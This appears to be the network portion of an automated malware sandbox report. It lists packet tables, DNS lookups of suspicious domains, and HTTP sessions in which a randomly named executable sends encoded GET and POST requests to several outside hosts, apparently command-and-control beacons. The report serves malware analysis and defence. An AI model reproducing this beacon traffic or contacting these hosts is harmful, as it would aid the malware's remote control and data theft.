                                                                              Jan 14, 2025 12:02:47.106496096 CET8049483134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:02:47.992187023 CET8049483134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:02:47.992269993 CET8049483134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:02:47.992350101 CET4948380192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:48.610086918 CET4948380192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:49.635632992 CET4948480192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:49.641153097 CET8049484134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:02:49.641253948 CET4948480192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:49.653376102 CET4948480192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:49.658317089 CET8049484134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:02:50.518213987 CET8049484134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:02:50.518290997 CET8049484134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:02:50.518498898 CET4948480192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:51.156887054 CET4948480192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:52.174710035 CET4948580192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:52.179969072 CET8049485134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:02:52.180078983 CET4948580192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:52.192111015 CET4948580192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:52.197000027 CET8049485134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:02:52.197236061 CET8049485134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:02:53.252290964 CET8049485134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:02:53.252367973 CET8049485134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:02:53.252409935 CET8049485134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:02:53.252429962 CET4948580192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:53.252470016 CET4948580192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:53.703900099 CET4948580192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:54.721962929 CET4948680192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:54.727180958 CET8049486134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:02:54.727329969 CET4948680192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:54.734879971 CET4948680192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:54.739830017 CET8049486134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:02:55.619914055 CET8049486134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:02:55.619946957 CET8049486134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:02:55.620110035 CET4948680192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:55.623383999 CET4948680192.168.2.5134.122.133.80
                                                                              Jan 14, 2025 12:02:55.628372908 CET8049486134.122.133.80192.168.2.5
                                                                              Jan 14, 2025 12:03:08.821048975 CET4948780192.168.2.547.83.1.90
                                                                              Jan 14, 2025 12:03:08.825923920 CET804948747.83.1.90192.168.2.5
                                                                              Jan 14, 2025 12:03:08.826011896 CET4948780192.168.2.547.83.1.90
                                                                              Jan 14, 2025 12:03:08.838386059 CET4948780192.168.2.547.83.1.90
                                                                              Jan 14, 2025 12:03:08.844727039 CET804948747.83.1.90192.168.2.5
                                                                              Jan 14, 2025 12:03:10.344486952 CET4948780192.168.2.547.83.1.90
                                                                              Jan 14, 2025 12:03:10.350960016 CET804948747.83.1.90192.168.2.5
                                                                              Jan 14, 2025 12:03:10.351070881 CET4948780192.168.2.547.83.1.90
                                                                              Jan 14, 2025 12:03:11.362644911 CET4948880192.168.2.547.83.1.90
                                                                              Jan 14, 2025 12:03:11.367638111 CET804948847.83.1.90192.168.2.5
                                                                              Jan 14, 2025 12:03:11.367712021 CET4948880192.168.2.547.83.1.90
                                                                              Jan 14, 2025 12:03:11.380228043 CET4948880192.168.2.547.83.1.90
                                                                              Jan 14, 2025 12:03:11.385034084 CET804948847.83.1.90192.168.2.5
                                                                              Jan 14, 2025 12:03:12.829078913 CET804948847.83.1.90192.168.2.5
                                                                              Jan 14, 2025 12:03:12.829128981 CET804948847.83.1.90192.168.2.5
                                                                              Jan 14, 2025 12:03:12.829243898 CET4948880192.168.2.547.83.1.90
                                                                              Jan 14, 2025 12:03:12.891500950 CET4948880192.168.2.547.83.1.90
                                                                              Jan 14, 2025 12:03:13.911031008 CET4948980192.168.2.547.83.1.90
                                                                              Jan 14, 2025 12:03:13.915893078 CET804948947.83.1.90192.168.2.5
                                                                              Jan 14, 2025 12:03:13.916006088 CET4948980192.168.2.547.83.1.90
                                                                              Jan 14, 2025 12:03:13.929827929 CET4948980192.168.2.547.83.1.90
                                                                              Jan 14, 2025 12:03:13.934639931 CET804948947.83.1.90192.168.2.5
                                                                              Jan 14, 2025 12:03:13.934899092 CET804948947.83.1.90192.168.2.5
                                                                              Jan 14, 2025 12:03:15.438245058 CET4948980192.168.2.547.83.1.90
                                                                              Jan 14, 2025 12:03:15.443495989 CET804948947.83.1.90192.168.2.5
                                                                              Jan 14, 2025 12:03:15.443685055 CET4948980192.168.2.547.83.1.90
                                                                              Jan 14, 2025 12:03:16.460872889 CET4949080192.168.2.547.83.1.90
                                                                              Jan 14, 2025 12:03:16.465893984 CET804949047.83.1.90192.168.2.5
                                                                              Jan 14, 2025 12:03:16.466003895 CET4949080192.168.2.547.83.1.90
                                                                              Jan 14, 2025 12:03:16.473526001 CET4949080192.168.2.547.83.1.90
                                                                              Jan 14, 2025 12:03:16.478456974 CET804949047.83.1.90192.168.2.5
                                                                              Jan 14, 2025 12:03:18.078668118 CET804949047.83.1.90192.168.2.5
                                                                              Jan 14, 2025 12:03:18.078754902 CET804949047.83.1.90192.168.2.5
                                                                              Jan 14, 2025 12:03:18.078934908 CET4949080192.168.2.547.83.1.90
                                                                              Jan 14, 2025 12:03:18.081434965 CET4949080192.168.2.547.83.1.90
                                                                              Jan 14, 2025 12:03:18.086327076 CET804949047.83.1.90192.168.2.5
                                                                              Jan 14, 2025 12:03:23.153251886 CET4949180192.168.2.584.32.84.32
                                                                              Jan 14, 2025 12:03:23.158215046 CET804949184.32.84.32192.168.2.5
                                                                              Jan 14, 2025 12:03:23.158313036 CET4949180192.168.2.584.32.84.32
                                                                              Jan 14, 2025 12:03:23.170435905 CET4949180192.168.2.584.32.84.32
                                                                              Jan 14, 2025 12:03:23.175333977 CET804949184.32.84.32192.168.2.5
                                                                              Jan 14, 2025 12:03:23.633894920 CET804949184.32.84.32192.168.2.5
                                                                              Jan 14, 2025 12:03:23.634114981 CET4949180192.168.2.584.32.84.32
                                                                              Jan 14, 2025 12:03:24.672626972 CET4949180192.168.2.584.32.84.32
                                                                              Jan 14, 2025 12:03:24.737838030 CET804949184.32.84.32192.168.2.5
                                                                              Jan 14, 2025 12:03:25.691330910 CET4949280192.168.2.584.32.84.32
                                                                              Jan 14, 2025 12:03:25.696520090 CET804949284.32.84.32192.168.2.5
                                                                              Jan 14, 2025 12:03:25.696652889 CET4949280192.168.2.584.32.84.32
                                                                              Jan 14, 2025 12:03:25.709511042 CET4949280192.168.2.584.32.84.32
                                                                              Jan 14, 2025 12:03:25.714329004 CET804949284.32.84.32192.168.2.5
                                                                              Jan 14, 2025 12:03:26.163661957 CET804949284.32.84.32192.168.2.5
                                                                              Jan 14, 2025 12:03:26.163973093 CET4949280192.168.2.584.32.84.32
                                                                              Jan 14, 2025 12:03:27.219523907 CET4949280192.168.2.584.32.84.32
                                                                              Jan 14, 2025 12:03:27.224477053 CET804949284.32.84.32192.168.2.5
                                                                              Jan 14, 2025 12:03:28.237582922 CET4949380192.168.2.584.32.84.32
                                                                              Jan 14, 2025 12:03:28.242691994 CET804949384.32.84.32192.168.2.5
                                                                              Jan 14, 2025 12:03:28.242786884 CET4949380192.168.2.584.32.84.32
                                                                              Jan 14, 2025 12:03:28.254761934 CET4949380192.168.2.584.32.84.32
                                                                              Jan 14, 2025 12:03:28.259653091 CET804949384.32.84.32192.168.2.5
                                                                              Jan 14, 2025 12:03:28.259890079 CET804949384.32.84.32192.168.2.5
                                                                              Jan 14, 2025 12:03:28.722188950 CET804949384.32.84.32192.168.2.5
                                                                              Jan 14, 2025 12:03:28.722352028 CET4949380192.168.2.584.32.84.32
                                                                              Jan 14, 2025 12:03:29.766402960 CET4949380192.168.2.584.32.84.32
                                                                              Jan 14, 2025 12:03:29.771517992 CET804949384.32.84.32192.168.2.5
                                                                              Jan 14, 2025 12:03:30.785437107 CET4949480192.168.2.584.32.84.32
                                                                              Jan 14, 2025 12:03:30.790399075 CET804949484.32.84.32192.168.2.5
                                                                              Jan 14, 2025 12:03:30.790604115 CET4949480192.168.2.584.32.84.32
                                                                              Jan 14, 2025 12:03:30.803652048 CET4949480192.168.2.584.32.84.32
                                                                              Jan 14, 2025 12:03:30.808510065 CET804949484.32.84.32192.168.2.5
                                                                              Jan 14, 2025 12:03:31.247462988 CET804949484.32.84.32192.168.2.5
                                                                              Jan 14, 2025 12:03:31.247546911 CET804949484.32.84.32192.168.2.5
                                                                              Jan 14, 2025 12:03:31.247581005 CET804949484.32.84.32192.168.2.5
                                                                              Jan 14, 2025 12:03:31.247628927 CET804949484.32.84.32192.168.2.5
                                                                              Jan 14, 2025 12:03:31.247664928 CET804949484.32.84.32192.168.2.5
                                                                              Jan 14, 2025 12:03:31.247665882 CET4949480192.168.2.584.32.84.32
                                                                              Jan 14, 2025 12:03:31.247703075 CET4949480192.168.2.584.32.84.32
                                                                              Jan 14, 2025 12:03:31.247704029 CET804949484.32.84.32192.168.2.5
                                                                              Jan 14, 2025 12:03:31.247745037 CET804949484.32.84.32192.168.2.5
                                                                              Jan 14, 2025 12:03:31.247757912 CET4949480192.168.2.584.32.84.32
                                                                              Jan 14, 2025 12:03:31.247781038 CET804949484.32.84.32192.168.2.5
                                                                              Jan 14, 2025 12:03:31.247816086 CET804949484.32.84.32192.168.2.5
                                                                              Jan 14, 2025 12:03:31.247827053 CET4949480192.168.2.584.32.84.32
                                                                              Jan 14, 2025 12:03:31.247850895 CET804949484.32.84.32192.168.2.5
                                                                              Jan 14, 2025 12:03:31.247895956 CET4949480192.168.2.584.32.84.32
                                                                              Jan 14, 2025 12:03:31.248250008 CET804949484.32.84.32192.168.2.5
                                                                              Jan 14, 2025 12:03:31.248306036 CET4949480192.168.2.584.32.84.32
                                                                              Jan 14, 2025 12:03:31.253209114 CET4949480192.168.2.584.32.84.32
                                                                              Jan 14, 2025 12:03:31.258023977 CET804949484.32.84.32192.168.2.5
                                                                              Jan 14, 2025 12:03:36.286953926 CET4949580192.168.2.5213.171.195.105
                                                                              Jan 14, 2025 12:03:36.291871071 CET8049495213.171.195.105192.168.2.5
                                                                              Jan 14, 2025 12:03:36.292005062 CET4949580192.168.2.5213.171.195.105
                                                                              Jan 14, 2025 12:03:36.311620951 CET4949580192.168.2.5213.171.195.105
                                                                              Jan 14, 2025 12:03:36.316653013 CET8049495213.171.195.105192.168.2.5
                                                                              Jan 14, 2025 12:03:36.910003901 CET8049495213.171.195.105192.168.2.5
                                                                              Jan 14, 2025 12:03:36.910083055 CET8049495213.171.195.105192.168.2.5
                                                                              Jan 14, 2025 12:03:36.910166979 CET4949580192.168.2.5213.171.195.105
                                                                              Jan 14, 2025 12:03:37.813265085 CET4949580192.168.2.5213.171.195.105
                                                                              Jan 14, 2025 12:03:38.832238913 CET4949680192.168.2.5213.171.195.105
                                                                              Jan 14, 2025 12:03:38.837213039 CET8049496213.171.195.105192.168.2.5
                                                                              Jan 14, 2025 12:03:38.837335110 CET4949680192.168.2.5213.171.195.105
                                                                              Jan 14, 2025 12:03:38.849809885 CET4949680192.168.2.5213.171.195.105
                                                                              Jan 14, 2025 12:03:38.854717970 CET8049496213.171.195.105192.168.2.5
                                                                              Jan 14, 2025 12:03:39.429853916 CET8049496213.171.195.105192.168.2.5
                                                                              Jan 14, 2025 12:03:39.429883957 CET8049496213.171.195.105192.168.2.5
                                                                              Jan 14, 2025 12:03:39.430018902 CET4949680192.168.2.5213.171.195.105
                                                                              Jan 14, 2025 12:03:40.360085964 CET4949680192.168.2.5213.171.195.105
                                                                              Jan 14, 2025 12:03:41.385045052 CET4949780192.168.2.5213.171.195.105
                                                                              Jan 14, 2025 12:03:41.390243053 CET8049497213.171.195.105192.168.2.5
                                                                              Jan 14, 2025 12:03:41.390340090 CET4949780192.168.2.5213.171.195.105
                                                                              Jan 14, 2025 12:03:41.404009104 CET4949780192.168.2.5213.171.195.105
                                                                              Jan 14, 2025 12:03:41.408938885 CET8049497213.171.195.105192.168.2.5
                                                                              Jan 14, 2025 12:03:41.409049034 CET8049497213.171.195.105192.168.2.5
                                                                              Jan 14, 2025 12:03:41.980588913 CET8049497213.171.195.105192.168.2.5
                                                                              Jan 14, 2025 12:03:41.980631113 CET8049497213.171.195.105192.168.2.5
                                                                              Jan 14, 2025 12:03:41.980690956 CET4949780192.168.2.5213.171.195.105
                                                                              Jan 14, 2025 12:03:42.907710075 CET4949780192.168.2.5213.171.195.105
                                                                              Jan 14, 2025 12:03:43.926064014 CET4949880192.168.2.5213.171.195.105
                                                                              Jan 14, 2025 12:03:43.931041002 CET8049498213.171.195.105192.168.2.5
                                                                              Jan 14, 2025 12:03:43.932466030 CET4949880192.168.2.5213.171.195.105
                                                                              Jan 14, 2025 12:03:43.941021919 CET4949880192.168.2.5213.171.195.105
                                                                              Jan 14, 2025 12:03:43.945826054 CET8049498213.171.195.105192.168.2.5
                                                                              Jan 14, 2025 12:03:44.546082973 CET8049498213.171.195.105192.168.2.5
                                                                              Jan 14, 2025 12:03:44.546106100 CET8049498213.171.195.105192.168.2.5
                                                                              Jan 14, 2025 12:03:44.546124935 CET8049498213.171.195.105192.168.2.5
                                                                              Jan 14, 2025 12:03:44.546148062 CET8049498213.171.195.105192.168.2.5
                                                                              Jan 14, 2025 12:03:44.546165943 CET8049498213.171.195.105192.168.2.5
                                                                              Jan 14, 2025 12:03:44.546344042 CET4949880192.168.2.5213.171.195.105
                                                                              Jan 14, 2025 12:03:44.546395063 CET4949880192.168.2.5213.171.195.105
                                                                              Jan 14, 2025 12:03:44.551666021 CET4949880192.168.2.5213.171.195.105
                                                                              Jan 14, 2025 12:03:44.556515932 CET8049498213.171.195.105192.168.2.5
                                                                              Jan 14, 2025 12:03:49.666727066 CET4949980192.168.2.585.159.66.93
                                                                              Jan 14, 2025 12:03:49.671694994 CET804949985.159.66.93192.168.2.5
                                                                              Jan 14, 2025 12:03:49.671799898 CET4949980192.168.2.585.159.66.93
                                                                              Jan 14, 2025 12:03:49.684063911 CET4949980192.168.2.585.159.66.93
                                                                              Jan 14, 2025 12:03:49.688891888 CET804949985.159.66.93192.168.2.5
                                                                              Jan 14, 2025 12:03:51.188971996 CET4949980192.168.2.585.159.66.93
                                                                              Jan 14, 2025 12:03:51.199464083 CET804949985.159.66.93192.168.2.5
                                                                              Jan 14, 2025 12:03:51.201400995 CET4949980192.168.2.585.159.66.93
                                                                              Jan 14, 2025 12:03:52.206614017 CET4950080192.168.2.585.159.66.93
                                                                              Jan 14, 2025 12:03:52.211472034 CET804950085.159.66.93192.168.2.5
                                                                              Jan 14, 2025 12:03:52.211590052 CET4950080192.168.2.585.159.66.93
                                                                              Jan 14, 2025 12:03:52.226914883 CET4950080192.168.2.585.159.66.93
                                                                              Jan 14, 2025 12:03:52.231729031 CET804950085.159.66.93192.168.2.5
                                                                              Jan 14, 2025 12:03:54.047657967 CET4950080192.168.2.585.159.66.93
                                                                              Jan 14, 2025 12:03:54.053133011 CET804950085.159.66.93192.168.2.5
                                                                              Jan 14, 2025 12:03:54.053217888 CET4950080192.168.2.585.159.66.93

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jan 14, 2025 12:01:19.071513891 CET5360351162.159.36.2192.168.2.5
                                                                              Jan 14, 2025 12:01:19.555974960 CET6489853192.168.2.51.1.1.1
                                                                              Jan 14, 2025 12:01:19.563612938 CET53648981.1.1.1192.168.2.5
                                                                              Jan 14, 2025 12:01:41.714757919 CET5898253192.168.2.51.1.1.1
                                                                              Jan 14, 2025 12:01:41.782213926 CET53589821.1.1.1192.168.2.5
                                                                              Jan 14, 2025 12:01:57.317643881 CET6352453192.168.2.51.1.1.1
                                                                              Jan 14, 2025 12:01:57.329682112 CET53635241.1.1.1192.168.2.5
                                                                              Jan 14, 2025 12:02:11.088268042 CET5518653192.168.2.51.1.1.1
                                                                              Jan 14, 2025 12:02:11.096929073 CET53551861.1.1.1192.168.2.5
                                                                              Jan 14, 2025 12:02:19.253741980 CET6405753192.168.2.51.1.1.1
                                                                              Jan 14, 2025 12:02:19.439596891 CET53640571.1.1.1192.168.2.5
                                                                              Jan 14, 2025 12:02:32.958010912 CET5422153192.168.2.51.1.1.1
                                                                              Jan 14, 2025 12:02:33.203530073 CET53542211.1.1.1192.168.2.5
                                                                              Jan 14, 2025 12:02:46.519309998 CET5082353192.168.2.51.1.1.1
                                                                              Jan 14, 2025 12:02:47.081890106 CET53508231.1.1.1192.168.2.5
                                                                              Jan 14, 2025 12:03:00.630786896 CET5070553192.168.2.51.1.1.1
                                                                              Jan 14, 2025 12:03:00.641879082 CET53507051.1.1.1192.168.2.5
                                                                              Jan 14, 2025 12:03:08.722414017 CET5422553192.168.2.51.1.1.1
                                                                              Jan 14, 2025 12:03:08.818295956 CET53542251.1.1.1192.168.2.5
                                                                              Jan 14, 2025 12:03:23.097570896 CET6515353192.168.2.51.1.1.1
                                                                              Jan 14, 2025 12:03:23.150932074 CET53651531.1.1.1192.168.2.5
                                                                              Jan 14, 2025 12:03:36.269834995 CET6055953192.168.2.51.1.1.1
                                                                              Jan 14, 2025 12:03:36.284084082 CET53605591.1.1.1192.168.2.5
                                                                              Jan 14, 2025 12:03:49.566143036 CET5700653192.168.2.51.1.1.1
                                                                              Jan 14, 2025 12:03:49.664401054 CET53570061.1.1.1192.168.2.5

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Jan 14, 2025 12:01:19.555974960 CET192.168.2.51.1.1.10xf0f4Standard query (0)18.31.95.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                              Jan 14, 2025 12:01:41.714757919 CET192.168.2.51.1.1.10xc240Standard query (0)www.zucchini.proA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 12:01:57.317643881 CET192.168.2.51.1.1.10x11f8Standard query (0)www.vh5g.sbsA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 12:02:11.088268042 CET192.168.2.51.1.1.10x2dadStandard query (0)www.v89ey584d.shopA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 12:02:19.253741980 CET192.168.2.51.1.1.10x49abStandard query (0)www.actionhub.liveA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 12:02:32.958010912 CET192.168.2.51.1.1.10xcdcdStandard query (0)www.100millionjobs.africaA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 12:02:46.519309998 CET192.168.2.51.1.1.10x9cfdStandard query (0)www.x3kwqc5tye4vl90y.topA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 12:03:00.630786896 CET192.168.2.51.1.1.10xe537Standard query (0)www.hwak.liveA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 12:03:08.722414017 CET192.168.2.51.1.1.10xddf9Standard query (0)www.qzsazi.infoA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 12:03:23.097570896 CET192.168.2.51.1.1.10xad06Standard query (0)www.truckgoway.infoA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 12:03:36.269834995 CET192.168.2.51.1.1.10xd6b9Standard query (0)www.aloezhealthcare.infoA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 12:03:49.566143036 CET192.168.2.51.1.1.10xa84bStandard query (0)www.letsbookcruise.xyzA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Jan 14, 2025 12:01:19.563612938 CET1.1.1.1192.168.2.50xf0f4Name error (3)18.31.95.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                              Jan 14, 2025 12:01:41.782213926 CET1.1.1.1192.168.2.50xc240No error (0)www.zucchini.pro199.59.243.228A (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 12:01:57.329682112 CET1.1.1.1192.168.2.50x11f8No error (0)www.vh5g.sbs188.114.97.3A (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 12:01:57.329682112 CET1.1.1.1192.168.2.50x11f8No error (0)www.vh5g.sbs188.114.96.3A (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 12:02:11.096929073 CET1.1.1.1192.168.2.50x2dadName error (3)www.v89ey584d.shopnonenoneA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 12:02:19.439596891 CET1.1.1.1192.168.2.50x49abNo error (0)www.actionhub.live67.223.117.189A (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 12:02:33.203530073 CET1.1.1.1192.168.2.50xcdcdNo error (0)www.100millionjobs.africa100millionjobs.africaCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 14, 2025 12:02:33.203530073 CET1.1.1.1192.168.2.50xcdcdNo error (0)100millionjobs.africa136.243.64.147A (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 12:02:47.081890106 CET1.1.1.1192.168.2.50x9cfdNo error (0)www.x3kwqc5tye4vl90y.topzcdn.8383dns.comCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 14, 2025 12:02:47.081890106 CET1.1.1.1192.168.2.50x9cfdNo error (0)zcdn.8383dns.com134.122.133.80A (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 12:02:47.081890106 CET1.1.1.1192.168.2.50x9cfdNo error (0)zcdn.8383dns.com134.122.135.48A (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 12:03:00.641879082 CET1.1.1.1192.168.2.50xe537Name error (3)www.hwak.livenonenoneA (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 12:03:08.818295956 CET1.1.1.1192.168.2.50xddf9No error (0)www.qzsazi.info47.83.1.90A (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 12:03:23.150932074 CET1.1.1.1192.168.2.50xad06No error (0)www.truckgoway.infotruckgoway.infoCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 14, 2025 12:03:23.150932074 CET1.1.1.1192.168.2.50xad06No error (0)truckgoway.info84.32.84.32A (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 12:03:36.284084082 CET1.1.1.1192.168.2.50xd6b9No error (0)www.aloezhealthcare.info213.171.195.105A (IP address)IN (0x0001)false
                                                                              Jan 14, 2025 12:03:49.664401054 CET1.1.1.1192.168.2.50xa84bNo error (0)www.letsbookcruise.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 14, 2025 12:03:49.664401054 CET1.1.1.1192.168.2.50xa84bNo error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 14, 2025 12:03:49.664401054 CET1.1.1.1192.168.2.50xa84bNo error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • www.zucchini.pro
                                                                              • www.vh5g.sbs
                                                                              • www.actionhub.live
                                                                              • www.100millionjobs.africa
                                                                              • www.x3kwqc5tye4vl90y.top
                                                                              • www.qzsazi.info
                                                                              • www.truckgoway.info
                                                                              • www.aloezhealthcare.info
                                                                              • www.letsbookcruise.xyz

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.549424199.59.243.228802520C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 12:01:41.803833961 CET394OUTGET /tqv2/?Gxq=1VbhX6&t0A=mw5EMDe107YJTqugc68gmErc1Hs+Bqgx5FZV14wN+wWnYz/1vECwz9qX0523rVAHVbCkyePm1aNLCJN6m48zyzkbcjQAczVPINQnyJ55BFcYg7GslxzSN34k4b/zmS+IfA== HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.zucchini.pro
                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                              Jan 14, 2025 12:01:42.268702984 CET1236INHTTP/1.1 200 OK
                                                                              date: Tue, 14 Jan 2025 11:01:41 GMT
                                                                              content-type: text/html; charset=utf-8
                                                                              content-length: 1478
                                                                              x-request-id: f005172f-db04-4f88-a4c0-d012ee8b913e
                                                                              cache-control: no-store, max-age=0
                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                              vary: sec-ch-prefers-color-scheme
                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_jxAM+Lgs+VBKywkLfQvupmI9uWWrgexGR4qV4PbWhSTg3zd7oS5t14Cjq/xePlRMUyVF+Zp4JxLCSdWWOldQLw==
                                                                              set-cookie: parking_session=f005172f-db04-4f88-a4c0-d012ee8b913e; expires=Tue, 14 Jan 2025 11:16:42 GMT; path=/
                                                                              connection: close
                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6a 78 41 4d 2b 4c 67 73 2b 56 42 4b 79 77 6b 4c 66 51 76 75 70 6d 49 39 75 57 57 72 67 65 78 47 52 34 71 56 34 50 62 57 68 53 54 67 33 7a 64 37 6f 53 35 74 31 34 43 6a 71 2f 78 65 50 6c 52 4d 55 79 56 46 2b 5a 70 34 4a 78 4c 43 53 64 57 57 4f 6c 64 51 4c 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_jxAM+Lgs+VBKywkLfQvupmI9uWWrgexGR4qV4PbWhSTg3zd7oS5t14Cjq/xePlRMUyVF+Zp4JxLCSdWWOldQLw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                              Jan 14, 2025 12:01:42.268728018 CET931INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjAwNTE3MmYtZGIwNC00Zjg4LWE0YzAtZDAxMmVlOGI5MTNlIiwicGFnZV90aW1lIjoxNzM2ODUyNT


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.549471188.114.97.3802520C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 12:01:57.356580019 CET644OUTPOST /54nj/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
